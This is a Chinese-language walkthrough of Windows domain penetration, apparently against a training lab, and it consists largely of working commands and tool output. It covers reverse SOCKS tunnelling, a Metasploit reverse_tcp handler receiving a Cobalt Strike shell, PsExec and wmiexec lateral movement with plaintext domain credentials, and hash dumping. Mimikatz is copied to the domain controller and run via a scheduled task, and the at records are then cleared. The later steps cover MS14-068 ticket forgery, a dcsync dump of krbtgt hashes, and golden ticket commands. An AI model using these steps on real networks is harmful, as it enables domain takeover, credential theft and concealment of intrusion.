ew穿透
使用nbtscan掃描主機
cs和msf聯動MSF添加路由進行內網滲透利用WMIEXEC橫向移動利用cobaltstrike橫向移動token竊取利用msf進行hash傳遞利用計劃任務獲取機器權限黃金票據kali上執行
./ew_for_linux64 -s rcsocks -l 1080 -e 112
肉雞上執行
ew_for_Win.exe -s rssocks -d 192.168.33.3 -e 112
之後配置proxychains
vim /etc/proxychains.conf
msf自帶的代理
配置proxychains
內網掃描使用cs的掃描模塊對192.168.52.0/24進行掃描
發現機器
使用lodan掃描內網
Ladon 192.168.52.0/24 OnlinePCLadon 192.168.52.0/24 oSscan
使用nbtscan掃描主機
C:\Users\Administrator\Downloads>nbt.exe 192.168.52.0/24
nbt.exe 192.168.52.0/24
192.168.52.1 WORKGROUP\DESKTOP-SVDB0O0 SHARING
192.168.52.138 GOD\OWA SHARING DC
192.168.52.141 GOD\ROOT-TVI862UBEH SHARING ?
192.168.52.143 GOD\STU1 SHARING
*timeout (normal end of scan)
cs和msf聯動Cobalt strike 派生 shell 給 MSF
首先msf創建監聽
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.33.3
msf exploit(handler) > set lport 6666
msf exploit(handler) > exploit -j之後在cs上
創建監聽
成功接收到會話
如果需要連接3389可開啟3389埠
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f或者關閉防火牆
run post/windows/manage/enable_rdpMSF添加路由進行內網滲透
查看當前網段
添加路由
run autoroute -s 192.168.52.0/24
橫向移動
psexec
直接kllist看到當前存在憑證
-accepteula初次打開會出現一堆信息,添加這個命令不會出現一堆信息
PsExec.exe -accepteula \\owa.god.org cmdPsExec.exe \\owa.god.org -u god\Administrator -p hongrisec@2019: cmd.exePsExec.exe \\192.168.52.138 -u god\Administrator -p hongrisec@2019: -s cmd /c "quser"
利用WMIEXEC橫向移動
wmiexec是psexec的升級版,比較好用
cscript.exe wmiexec.vbs /cmd 192.168.52.138 god\Administrator hongrisec@2019: "ipconfig" 單條命令模式cscript.exe //nologo wmiexec.vbs /shell 192.168.52.138 god\Administrator hongrisec@2019: 半交互模式
利cobaltstrike橫向移動
因為192.168.52.0/24段不能直接連接到192.168.33.3(kali地址),所以需要CS派生smb beacon。讓內網的主機連接到win7上。
SMB Beacon使用命名管道通過父級Beacon進行通訊,當兩個Beacons連結後,子Beacon從父Beacon獲取到任務並發送。因為連結的Beacons使用Windows命名管道進行通信,此流量封裝在SMB協議中,所以SMB Beacon相對隱蔽,繞防火牆時可能發揮奇效。
首先
利用cs的派生會話
得到一個派生的會話
hash傳遞
拿到域內所有機器
或者利用token竊取
成功拿到伺服器
利用msf進行hash傳遞添加路由
run autoroute -s 192.168.52.0/24利用getsystem提權
獲取hash
run post/windows/gather/hashdumpmeterpreter > getsystem...Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::利用msf直接獲取meterpreter
使用正向連接
sf5 exploit(windows/smb/psexec) > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > show options
set payload windows/meterpreter/bind_tcp
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --- -
RHOSTS 192.168.52.141 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain god no The Windows domain to use for authentication
SMBPass hongrisec@2019: no The password for the specified username
SMBUser Administrator no The username to authenticate as
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --- -
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 9912 yes The listen port
RHOST 192.168.52.141 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/psexec) > set RHOST 192.168.52.141
RHOST => 192.168.52.141
msf5 exploit(windows/smb/psexec) > exploit
[*] 192.168.52.141:445 - Connecting to the server...
[*] 192.168.52.141:445 - Authenticating to 192.168.52.141:445|god as user 'Administrator'...
[*] 192.168.52.141:445 - Selecting native target
[*] 192.168.52.141:445 - Uploading payload... NdNRbMHz.exe
[*] 192.168.52.141:445 - Created \NdNRbMHz.exe...
[+] 192.168.52.141:445 - Service started successfully...
[*] 192.168.52.141:445 - Deleting \NdNRbMHz.exe...
[*] Started bind TCP handler against 192.168.52.141:9912
[*] Sending stage (180291 bytes) to 192.168.52.141
[*] Meterpreter session 2 opened (192.168.33.3-192.168.33.5:0 -> 192.168.52.141:9912) at 2020-05-22 14:12:38 +0800
meterpreter >
利用msf的psexec執行命令
use auxiliary/admin/smb/psexec_command
msf5 auxiliary(admin/smb/psexec_command) > set RHOSTS 192.168.52.138 ip
RHOSTS => 192.168.52.138
msf5 auxiliary(admin/smb/psexec_command) > set SMBDOMAIN god 域名 god/Administrator
SMBDOMAIN => god
msf5 auxiliary(admin/smb/psexec_command) > set SMBUSER Administrator 域用戶
SMBUSER => Administrator
msf5 auxiliary(admin/smb/psexec_command) > set SMBPASS hongrisec@2019: 密碼 或者hash
SMBPASS => hongrisec@2019:
msf5 auxiliary(admin/smb/psexec_command) > set COMMAND ipconfig 命令
COMMAND => ipconfig
msf5 auxiliary(admin/smb/psexec_command) > exploit
[+] 192.168.52.138:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.52.138:445 - checking if the file is unlocked
[*] 192.168.52.138:445 - Getting the command output...
[*] 192.168.52.138:445 - Executing cleanup...
[+] 192.168.52.138:445 - Cleanup was successful
[+] 192.168.52.138:445 - Command completed successfully!
[*] 192.168.52.138:445 - Output for "ipconfig":
Windows IP ����
���������� ��������:
�����ض��� DNS �� . . . . . . . :
�������� IPv6 ��. . . . . . . . : fe80::482e:ddf9:ce9f:4854%11
IPv4 �� . . . . . . . . . . . . : 192.168.52.138
�������� . . . . . . . . . . . . : 255.255.255.0
Ĭ������. . . . . . . . . . . . . : 192.168.52.2
���������� isatap.{D7C92CB6-1939-46AC-85CE-50401CEC5056}:
ý��״ . . . . . . . . . . . . : ý���ѶϿ�
�����ض��� DNS �� . . . . . . . :
[*] 192.168.52.138:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed利用IPC入侵
建立ipc連接
n
et use \\192.168.52.138\ipc$ "hongrisec@2019:" /user:god\Administrator
C:\Windows\system32>dir \\192.168.52.138\c$
dir \\192.168.52.138\c$
Volume in drive \\192.168.52.138\c$ has no label.
Volume Serial Number is 1E4D-1970
Directory of \\192.168.52.138\c$
19/10/13 13:06 <DIR> ExchangeSetupLogs
19/08/24 21:55 <DIR> inetpub
09/07/14 11:20 <DIR> PerfLogs
19/08/24 21:34 <DIR> Program Files
19/08/24 21:34 <DIR> Program Files (x86)
19/10/13 18:01 <DIR> redis
20/05/14 22:11 <DIR> Users
20/05/22 13:41 <DIR> Windows
0 File(s) 0 bytes
8 Dir(s) 13,964,476,416 bytes free
C:\Windows\system32>
查看目標機器運行的進程
C:\Users\Administrator\Downloads>tasklist /S 192.168.52.138 /U god\Administrator /P hongrisec@2019:利用計劃任務獲取機器權限
查看時間目標機器時間
C:\Windows\system32>net time \\192.168.52.138
net time \\192.168.52.138
Current time at \\192.168.52.138 is 2020/5/22 17:12:03
The command completed successfully.
C:\Windows\system32>
copy mimikatz.exe \\192.168.52.138\c$
copy mimidrv.sys \\192.168.52.138\c$
copy mimilib.dll \\192.168.52.138\c$
at \\192.168.52.138 17:29:00 C:\mimi.batmimi.bat的內容為
c:\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit>1.txtcopy mimikatz_x64.exe \\192.168.52.138\c$計劃任務執行
at \\192.168.52.138 17:54:00 cmd.exe /c "C:\mimikatz_x64.exe>1.txt"
清除痕跡
#清除at記錄
at \\192.168.1.1 ID /deletenet use 遠程名稱 /del /y
ms14-068
Benjamin Delpy(mimikatz的作者)寫了一個MS14-068的利用工具,叫Kekeo,是PyKEk的升級版,他能夠找到並定位有漏洞的域控,在打了補丁(KB3011780)和 2012/2012r2域控情況下仍能奏效。
在利用ms14-068漏洞之前,建議先使用 klist/purge 清除伺服器端緩存的 Kerberos 憑據,且使用域控地址不使用IP.
.獲取域用戶的SID
SID(安全標識符),是為域或本地計算機中創建每個帳戶所分配的唯一ID字符串。
whoami /all
S-1-5-21-2952760202-1353902439-2381784089-500
輸入klist查看票據
如果有就輸入klist purge清除
ms14-068.exe -u Administrator@god.org -p "hongrisec@2019:" -s S-1-5-21-2952760202-1353902439-2381784089-500 -d owa.god.org-u 域用戶@域名-s 域用戶SID-d 域控制器地址-p 域成員密碼可以發現得到一個票據
注入內存
再使用mimikatz將票據(TGT)注入到當前內存中,來偽造kerberos協議認證證書。
kerberos::purge kerberos::list kerberos::ptc TGT_Administrator@god.org.ccache kerberos::ptt TGT_Administrator@god.org.kirbi依然是使用ms14-068生成一個票據。
執行命令後會在當前目錄生成.ccache 的文件
然後使用 KrbCredExport 將 .ccache文件轉化為kirbi格式,也就是user.tickethttps://github.com/rvazarkar/KrbCredExport
python KrbCredExport.py TGT_tidetest@tide.org.ccache user.ticket
現在使用kekeo版
輸入klist查看票據如果有就輸入klist purge清除kekeo.exe /domain:god.org /user:Adminstrator /password:hongrisec@2019:/ /ptt黃金票據首先
可以直接使用mimikatz獲取krbtgt的hash
privilege::debug
mimikatz log
mimikatz # lsadump::dcsync /domain:god.org /user:krbtgt
[DC] 'god.org' will be the domain
[DC] 'owa.god.org' will be the DC server
[DC] 'krbtgt' will be the user account
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 2019/8/24 21:44:23
Object Security ID : S-1-5-21-2952760202-1353902439-2381784089-502
Object Relative ID : 502
Credentials:
Hash NTLM: 58e91a5ac358d86513ab224312314061
ntlm- 0: 58e91a5ac358d86513ab224312314061
lm - 0: a151f0fbafab56da67864278a60a75e8
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
Default Salt : GOD.ORGkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : a780c2c18b3287e3448562a36dccb2d57d11fd398b55ce2
cd9b128308cef74df
aes128_hmac (4096) : 2e35721544960f553afcba54252d7b13
des_cbc_md5 (4096) : 8cc1019b7ccd1319
rc4_plain (4096) : 58e91a5ac358d86513ab224312314061
* Primary:Kerberos *
Default Salt : GOD.ORGkrbtgt
Credentials
des_cbc_md5 : 8cc1019b7ccd1319
rc4_plain : 58e91a5ac358d86513ab224312314061
* Packages *
Kerberos-Newer-Keys
* Primary:WDigest *
01 abb457b021966fc900dc1cebd9c4d188
02 2d15787683382a038d82e156840ecb77
03 18ef670658849985036123a064571815
04 abb457b021966fc900dc1cebd9c4d188
05 2d15787683382a038d82e156840ecb77
06 7ae9071dab444ffbc1501482b8da7fcf
07 abb457b021966fc900dc1cebd9c4d188
08 e9bf3798e5576c80edb166bfdafdd619
09 e9bf3798e5576c80edb166bfdafdd619
10 5f7902c1420805e10f6cd9eec52a8ef2
11 5703bb42566a5fc66608da6d5f970edd
12 e9bf3798e5576c80edb166bfdafdd619
13 7c25bef95327fc5526d56998fd8f0559
14 5703bb42566a5fc66608da6d5f970edd
15 218957cc83eb53a3b8bbe1b224dff044
16 218957cc83eb53a3b8bbe1b224dff044
17 05a7d647bdbb4585bb7c16fdff9a134d
18 fd69eb9c15b4d06b66d64bb6654ec88c
19 016f7e4fb4d3479153aed646b3f68fff
20 579c3a2eccfb4a5ce12a6bef37168cd1
21 d6dca44013c12ed0fbb36f0f21a016ac
22 d6dca44013c12ed0fbb36f0f21a016ac
23 2eab868d52e16908d3ee3b44edf00a39
24 0b518bae8d78e8d2961e429d16f361fc
25 0b518bae8d78e8d2961e429d16f361fc
26 b2c7b7ae7e52799e7f8d71350f983583
27 786df62e1c05700ff1bfae6bad92ac76
28 16464caeecd021b600794f8f36947f86
29 eb729371fa8cc2a1e43c4c6614f60f3b
mimikatz #有2種方法生成票據,利用aes,或者利用hash
重要的需要域的sid krbtgt的ntlm hash,和aes256_hmac
黃金票據的2種利用方法
生成黃金票據導出為文件
# 使用krbtgt的hash值:
mimikatz# kerberos::gloden /user:Administrator /domain:xxx.xxx.xxx /sid:xxxxxxxxxxxxx krbtgt:ntlm-hashvlaue /ticket:test.kribi
# 使用krbtgt的aes256值:
mimikatz# kerberos::gloden /domain:xxx.xxx /sid:xxxxxxxxxxx /aes256:xxxxxxxx /user:Administrator /ticket:test.kribi利用
mimikatz::ptt test.kribi
PS C:\Users\Administrastor> klist
PS C:\Users\Administrastor> net use \\xx.domain-name
dir \\xx.domain-name\c$
生成黃金票據導入到內存
mimikatz# "kerberos::gloden /user:Administrator /domain:xxx.xxx.xxx /sid:xxxxxxxxxxxxx krbtgt:ntlm-hashvlaue /ptt" exit
mimikatz "kerberos::golden /domain:<域名> /sid:<域SID> /aes256:<aes256_hmac> /user:<任意用戶名> /ptt" exit#利用票據訪問
PS C:\Users\Administrastor> net use \\xx.domain-name dir \\xx.domain-name\c$利用PsExec 訪問
psexec \\192.168.52.138 cmd利用wmiexec.vbs
cscript.exe cscript.exe wmiexec.vbs /cmd 192.168.52.138 "command"